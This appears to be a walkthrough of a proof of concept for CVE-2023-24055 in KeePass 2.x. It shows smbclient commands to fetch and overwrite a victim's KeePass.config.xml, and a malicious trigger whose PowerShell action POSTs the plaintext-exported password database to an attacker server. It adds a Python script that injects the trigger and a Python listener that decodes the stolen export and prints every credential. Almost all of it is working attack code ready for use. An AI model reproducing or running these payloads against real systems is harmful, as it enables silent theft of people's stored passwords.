CVE-2023-24055 KeePass 2.5x

KeePass 2.x runs the triggers listed in KeePass.config.xml without asking the user, so write access to that file (here: through an SMB share) is enough to make KeePass export the open database in plaintext and send it to a server you control. The steps:

  1. Connect to the target
  2. Download the config
  3. Add a trigger
  4. Put it back in the target.
  5. Create a web server
  6. Decode

I'm not the author of this POC.
https://github.com/alt3kx/CVE-2023-24055_PoC

Connect to the target

List the shares.

smbclient -L //192.168.1.182

Connect to the share. Roaming is the user's %APPDATA% folder, which is where an installed KeePass keeps its config.

smbclient \\\\192.168.1.182\\Roaming

Download the config

get KeePass\KeePass.config.xml

This is what the file looks like.

Add a trigger

The POC:

<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<!-- event: the database file was saved -->
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<!-- action 1: export the open database, unencrypted, as KeePass XML -->
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter> <!-- This one: export path, change the user name -->
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<!-- action 2: run PowerShell, POST the export base64-encoded to the attacker server -->
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter> <!-- And this one: same path, plus your server address -->
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>

Two lines have to be changed.
The first one: the export path must use the Windows user name of the target.
The second one: the same path inside the PowerShell command, plus the address of the web server that will receive the file.
This is my version:

...
					<Parameters>
						<Parameter>c:\Users\peanutstick\AppData\Local\Temp\exploit.xml</Parameter> <!-- This one -->
						<Parameter>KeePass XML (2.x)</Parameter>
...
...
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://192.168.1.69:1337/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\peanutstick\AppData\Local\Temp\exploit.xml'))) </Parameter> <!-- And this one -->
						<Parameter>False</Parameter>
						...
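Doing the two-line edit by hand is error-prone (a wrong user name means the export lands in a folder that does not exist and the POST sends nothing). The script below is an added example, not code from the original write-up or from the alt3kx PoC: it takes the downloaded KeePass.config.xml, inserts the trigger from the PoC with the export path and URL filled in from arguments, and leaves everything else in the file untouched. It assumes the element path Configuration/Application/TriggerSystem/Triggers for where KeePass stores its triggers (check it against the file you downloaded), and the sample config at the bottom is constructed for the demo.

```python
"""Inject the PoC trigger into a KeePass.config.xml (added example, not the PoC's own code)."""
import base64
import os
import sys
import xml.etree.ElementTree as ET

# Trigger type GUIDs exactly as they appear in the PoC XML on this page.
EVENT_SAVED_DATABASE = "s6j9/ngTSmqcXdW6hDqbjg=="
ACTION_EXPORT_DATABASE = "D5prW87VRr65NO2xP5RIIg=="
ACTION_EXECUTE_CMDLINE = "2uX4OwcwTBOe7y66y27kxw=="


def _params(parent, values):
    """Append <Parameters><Parameter>...</Parameter>...</Parameters>; None -> <Parameter />."""
    ps = ET.SubElement(parent, "Parameters")
    for v in values:
        ET.SubElement(ps, "Parameter").text = v
    return ps


def build_trigger(user: str, exfil_url: str, name: str = "exploit") -> ET.Element:
    """Build the PoC trigger: on 'database saved', export as KeePass XML, then POST it."""
    export_path = rf"c:\Users\{user}\AppData\Local\Temp\exploit.xml"
    ps_args = (
        "-ex bypass -noprofile -c Invoke-WebRequest -uri " + exfil_url
        + " -Method POST -Body ([System.Convert]::ToBase64String("
        + f"[System.IO.File]::ReadAllBytes('{export_path}')))"
    )
    trig = ET.Element("Trigger")
    # KeePass trigger GUIDs are 16 random bytes, base64-encoded; the PoC uses a fixed one.
    ET.SubElement(trig, "Guid").text = base64.b64encode(os.urandom(16)).decode()
    ET.SubElement(trig, "Name").text = name
    ev = ET.SubElement(ET.SubElement(trig, "Events"), "Event")
    ET.SubElement(ev, "TypeGuid").text = EVENT_SAVED_DATABASE
    _params(ev, ["0", None])
    ET.SubElement(trig, "Conditions")
    actions = ET.SubElement(trig, "Actions")
    export = ET.SubElement(actions, "Action")
    ET.SubElement(export, "TypeGuid").text = ACTION_EXPORT_DATABASE
    _params(export, [export_path, "KeePass XML (2.x)", None, None])
    run = ET.SubElement(actions, "Action")
    ET.SubElement(run, "TypeGuid").text = ACTION_EXECUTE_CMDLINE
    _params(run, ["PowerShell.exe", ps_args, "False", "1", None])
    return trig


def inject_trigger(config_xml: bytes, user: str, exfil_url: str) -> bytes:
    """Return the config with the trigger added; creates the Triggers path if missing."""
    root = ET.fromstring(config_xml)
    if root.tag != "Configuration":
        raise ValueError("not a KeePass.config.xml (root is %r)" % root.tag)
    node = root
    for tag in ("Application", "TriggerSystem", "Triggers"):  # assumed element path
        child = node.find(tag)
        if child is None:
            child = ET.SubElement(node, tag)
        node = child
    node.append(build_trigger(user, exfil_url))
    if hasattr(ET, "indent"):  # Python 3.9+: keep the file readable
        ET.indent(root)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def list_triggers(config_xml: bytes) -> list:
    """(name, action parameters) per trigger: use it to check the edit before uploading."""
    root = ET.fromstring(config_xml)
    found = []
    for trig in root.iterfind("./Application/TriggerSystem/Triggers/Trigger"):
        params = [p.text or "" for p in trig.iterfind("./Actions/Action/Parameters/Parameter")]
        found.append((trig.findtext("Name", ""), params))
    return found


# Constructed sample config for the demo; a real one has many more settings.
SAMPLE_CONFIG = b"""<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <Application>
    <LastUsedFile><Path>C:\\Users\\peanutstick\\Documents\\Database.kdbx</Path></LastUsedFile>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers />
    </TriggerSystem>
  </Application>
</Configuration>
"""

if __name__ == "__main__":
    # usage: inject.py KeePass.config.xml peanutstick http://192.168.1.69:1337/exploit.raw
    path, user, url = sys.argv[1:4]
    with open(path, "rb") as f:
        patched = inject_trigger(f.read(), user, url)
    with open(path, "wb") as f:
        f.write(patched)
    for name, params in list_triggers(patched):
        print(name, params[0], params[5][:60] + "...")
```

Run list_triggers on the result and compare the first and sixth action parameters with the two lines above before putting the file back; ElementTree drops unused xmlns declarations on the root element, so diff the output against the original if you want to be sure nothing else moved.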

Put it back in the target.

Upload the edited file over the same share, overwriting KeePass\KeePass.config.xml. KeePass picks the trigger up from this file by itself, so nothing else has to be done on the target.

Create a web server

We need a web server that accepts a POST request, because the PowerShell action sends the exported file as the body of a POST.
This one is good:
https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7
Start it and wait: the trigger fires on the "saved database file" event, so the Windows user has to save the database (for example after adding a new password).

And voilà: the server receives the exported database, base64-encoded.

Decode

echo "string" | base64 -d > passwords.txt

"string" is the request body printed by the server. The result is the KeePass XML (2.x) export, with every password in plaintext.
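Instead of copying the base64 string out of the gist's output and decoding it by hand, the receiver can do the decoding and pull the credentials out of the export directly. The code below is an added example, not part of the original write-up or the linked gist: it listens on the port used above, base64-decodes the POST body, saves the XML and walks the KeePass XML (2.x) structure (Root/Group/Entry/String with Key/Value pairs, nested groups, and a History element per entry that holds old revisions of the same entry). Listen address, output file name and the sample export at the bottom are assumptions; the sample is constructed for the demo.

```python
"""Receive and parse the exported database (added example, not the page's own code)."""
import base64
import sys
import xml.etree.ElementTree as ET
from http.server import BaseHTTPRequestHandler, HTTPServer

OUTPUT_FILE = "passwords.xml"  # assumption: where the decoded export is written


def decode_body(body: bytes) -> bytes:
    """Undo [System.Convert]::ToBase64String(); whitespace is stripped in case a proxy or copy/paste wrapped the lines."""
    return base64.b64decode(b"".join(body.split()), validate=True)


def extract_entries(xml_bytes: bytes) -> list:
    """One dict per entry in a 'KeePass XML (2.x)' export.

    The export is unencrypted, so the Password <Value> is plaintext. Only direct
    <Entry> children of each <Group> are collected: the <History> inside an entry
    contains older copies of it, which would otherwise be listed as extra entries.
    """
    root = ET.fromstring(xml_bytes)
    entries = []

    def walk(group, path):
        here = path + [group.findtext("Name", "")]
        for entry in group.findall("Entry"):
            fields = {s.findtext("Key", ""): s.findtext("Value", "") for s in entry.findall("String")}
            entries.append({
                "group": "/".join(here),
                "title": fields.get("Title", ""),
                "username": fields.get("UserName", ""),
                "password": fields.get("Password", ""),
                "url": fields.get("URL", ""),
            })
        for sub in group.findall("Group"):
            walk(sub, here)

    for top in root.findall("./Root/Group"):
        walk(top, [])
    return entries


class ExfilHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        try:
            xml_bytes = decode_body(body)
            with open(OUTPUT_FILE, "wb") as f:
                f.write(xml_bytes)
            for e in extract_entries(xml_bytes):
                print(f"{e['group']} | {e['title']} | {e['username']} | {e['password']} | {e['url']}")
        except Exception as exc:  # not base64, or not a KeePass export
            print(f"could not decode body from {self.client_address[0]}: {exc}", file=sys.stderr)
        self.send_response(200)
        self.end_headers()

    do_PUT = do_POST  # harmless to accept either verb


def serve(host="0.0.0.0", port=1337):
    HTTPServer((host, port), ExfilHandler).serve_forever()


# Constructed sample of what KeePass writes for the 'KeePass XML (2.x)' format.
SAMPLE_EXPORT = b"""<?xml version="1.0" encoding="utf-8"?>
<KeePassFile>
  <Meta><DatabaseName>Sample</DatabaseName></Meta>
  <Root>
    <Group>
      <Name>Database</Name>
      <Entry>
        <String><Key>Title</Key><Value>Mail</Value></String>
        <String><Key>UserName</Key><Value>john</Value></String>
        <String><Key>Password</Key><Value ProtectInMemory="True">hunter2</Value></String>
        <String><Key>URL</Key><Value>https://mail.example</Value></String>
        <History>
          <Entry>
            <String><Key>Title</Key><Value>Mail</Value></String>
            <String><Key>Password</Key><Value>old-password</Value></String>
          </Entry>
        </History>
      </Entry>
      <Group>
        <Name>Work</Name>
        <Entry>
          <String><Key>Title</Key><Value>VPN</Value></String>
          <String><Key>UserName</Key><Value>jdoe</Value></String>
          <String><Key>Password</Key><Value>Tr0ub4dor&amp;3</Value></String>
        </Entry>
      </Group>
    </Group>
  </Root>
</KeePassFile>
"""
SAMPLE_POST_BODY = base64.b64encode(SAMPLE_EXPORT)  # what the PowerShell action would send

if __name__ == "__main__":
    serve()
```

The handler answers 200 regardless, so the PowerShell process on the target exits quietly either way; the decoded file on disk is the same thing the base64 -d step above produces.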